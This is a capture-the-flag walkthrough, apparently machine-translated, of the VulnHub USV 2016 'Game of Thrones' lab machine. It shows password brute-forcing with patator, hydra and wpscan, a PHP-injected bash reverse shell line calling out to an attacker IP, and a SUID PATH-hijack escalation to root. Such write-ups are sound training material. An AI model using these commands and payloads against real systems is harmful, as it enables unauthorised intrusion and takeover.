VulnHub: USV 2016. CTF in Romania, what are they?

Good day to all, in this article we consider the decision of the Romanian CTF-USV 2016 , on the topic: "Game of thrones . " You can download a virtual machine image via the link from VulnHub.

If you are wondering how are the interuniversity CTF in Romania, I ask under the cat
')

Little about CTF

CTF-USV 2016 Security Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ ionutge1)

There are 7 flags in the following format: Country_name Flag: [md5 hash] .

Let's start!

Examine nmap's goal:

$ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV -p1-65535 

Starting Nmap 7.01 ( nmap.org ) at 2017-01-15 19:47 MSK
Nmap scan report for 192.168.1.102
Host is up (0.00057s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22 / tcp open ssh OpenSSH 7.3 (protocol 2.0)
80 / tcp open http Apache httpd
3129 / tcp open http proxy Squid http proxy 3.5.22
3306 / tcp open mysql MariaDB (unauthorized)
4444 / tcp open http Foundry EdgeIron switch http config
21211 / tcp open ftp vsftpd 2.0.8 or later
MAC Address: 08: 00: 27: 2B: 64: 55 (Oracle VirtualBox virtual NIC)
Service Info: Host: SevenKingdoms; Device: switch

And let's start taking flags ...

Flag 1 (Croatia)

With the first flag, it's simple. Run nikto , which immediately informs us about the presence of an unusual title:

 $ nikto -h 192.168.1.102 

+ Uncommon header 'x-xss-protection' found, with contents: Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg ==

Decode it:

 $ echo Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg== | base64 -d Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb 

Flag 2 (Italy)

Such a dragon can be seen when connecting via ssh . And at the very bottom of the encrypted string:

wDOW0gW / QssEtq5Y3nHX4XlbH / Dnz27qHFhHVpMulJSyDCvex ++ YCd42tx7HKGgB

On closer inspection, you can see the presence of some of the letters that make up the picture. Putting it all together we get:

AES ECB xxxxx0000000xxxxxx

We have the algorithm, the key and the encrypted message, for example, here , decrypt and get the second flag:

Italy Flag: 0047449b33fbae830d833721edaef6f1

Flag 3 (Portugal)

Go to the web. We have a website (port 80), and there is a proxy (port 3129). Having specified the address and port of the proxy server in the settings, in this case the attacked machine, we open the site:



Not much, continue:



Plain WordPress, nothing remarkable. Having opened the index page, we get to the blog, with several articles about the “Game of Thrones” . The first thing that catches your eye is the following publication:



Having opened this image, we notice that it is located in the hodor directory:



Going to that, we are offered to download the archive:



In the archive we are waiting for the image:



And the flag:

 $ echo UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y= | base64 -d Portugal Flag: a2663b23045de56c7e96a406429f733f 

Flag 4 (Paraguay)

At the very bottom of the page, attention is attracted by this post:



Parsim site, and collect a dictionary with passwords for brute force:

 cewl --proxy_host 192.168.1.102 --proxy_port 3129 http://192.168.1.102/blog/ > blog.lst 

After running the search, after a while, the patator gives the correct password:

 $ patator http_fuzz http_proxy=192.168.1.102:3129 url='http://192.168.1.102/blog/wp-login.php?action=postpass' method=POST header='Referer: "http://192.168.1.102/blog/index.php/2016/10/16/the-secret-chapter/"' body='post_password=FILE0&Submit=Enter' 0=blog.lst -x ignore:fgrep='post-password-form' follow=1 accept_cookie=1 

Enter it and access the content of this publication:



We decode the base64 line located here and get a new flag:

 $ echo UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk= | base64 -d Paraguay Flag: 4761b65f20053674657c7e6186628a29 

Flag 5 (Thailand)

If you believe the content of this post, then the password is right before our eyes, yes, the picture here is clearly a topic. But if you look closely, there is a phrase below:

She use the raining of replication for her army.

Great, where to log in, we know, there is a password. At first I tried to enter individual words, then I added scraps of phrases there, and soon hydra found what was needed:



Connect:

 $ ftp 192.168.1.102 21211 ftp> ls -ahl 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. dr-xr-xr-x 2 1000 1000 4096 Dec 05 20:05 . dr-xr-xr-x 2 1000 1000 4096 Dec 05 20:05 .. -rw-r--r-- 1 0 0 94 Dec 05 20:04 .note.txt -rw-r--r-- 1 0 0 32 Dec 05 20:05 readme.txt 226 Directory send OK. 

Download all the available files, then we will study them:

 ftp> get readme.txt local: readme.txt remote: readme.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for readme.txt (32 bytes). 226 Transfer complete. 32 bytes received in 0.00 secs (226.4 kB/s) ftp> get .note.txt local: .note.txt remote: .note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .note.txt (94 bytes). 226 Transfer complete. 94 bytes received in 0.00 secs (791.4 kB/s) 

There is nothing interesting in the first file:


But the second is worthy of attention:


We learned a hint to the password - these are the names of her children, google quickly suggested what children were talking about and what their names were. Therefore, running crunch, we start generating the dictionary:

 $ crunch 1 1 -p Rhaegal Viserion Drogon > dragons 

We send it to wpscan for sorting:

 $ sudo ./wpscan.rb --proxy 192.168.1.102:3129 --url http://192.168.1.102/blog/ --username mother_of_dragons --wordlist dragons 

After some time, we get the password from the WordPress admin panel. Log in and in the current user profile find the following flag:

 $ echo VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM= | base64 -d Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733 

Flag 6 (Mongolia)

As it turned out, Daenerys has administrator rights in this blog, so by editing the index.php file, we will make ourselves a shell by adding the line:

 system('bash -i >& /dev/tcp/192.168.1.124/4444 0>&1'); 

We start netcat, reload the page in the browser, and get the shell:



Looking around in the system, attention is drawn to the file reward_flag.txt , in the web server directory:

 [http@arch blog]$ ls -ahl ../ total 92K drwxr-xr-x 3 root root 4.0K Nov 17 15:43 . drwxr-xr-x 4 root root 4.0K May 31 2013 .. drwxr-xr-x 6 http http 4.0K Jan 15 19:52 blog -rw-r--r-- 1 root root 59K Nov 16 19:59 gtr.jpg -rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html -rw-r--r-- 1 root root 65 Nov 17 15:41 reward_flag.txt -rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger 

Let's open it, apparently, there should be a flag:

 [http@arch blog]$ cat ../reward_flag.txt TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ= [http@arch blog]$ echo TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ= | base64 -d Mongolia Flag: 6b49c13cccd91940f09d79e142108394 

Flag 7 (Somalia)

In the directory with the last flag is still some kind of application winterfell_messenger , which, judging by the presence of the SUID bit, will probably help to increase its privileges in the system. Run it and see what it does:

 [http@arch http]$ ./winterfell_messenger cat: /root/message.txt: No such file or directory 

So, what about the lines?


Even reversing is not necessary, we have setuid , and system , which uses the relative path for the cat command , and from the documentation for the system we know that:

system () executes the commands specified in string , in turn invoking the / bin / sh -c string command, and is returned when the command is executed.

In general, we act according to the familiar algorithm:

 [http@arch http]$ PATH=/tmp:$PATH [http@arch http]$ echo "/bin/bash" > /tmp/cat [http@arch tmp]$ chmod +x cat 

Run the vulnerable program and get the shell:

 [http@arch tmp]$ /srv/http/winterfell_messenger /srv/http/winterfell_messenger id uid=0(root) gid=33(http) groups=33(http) 

In the root directory we find the last flag:

 echo U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA== | base64 -d Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34 

And we accept congratulations:



As stated in the description, this is their first CTF . For the first time it will come down, but you should not repeat it, let's hope they will continue to develop this topic, adding more sophisticated tasks, because in real life, unfortunately, no one can surprise anyone with a banal scan of directories.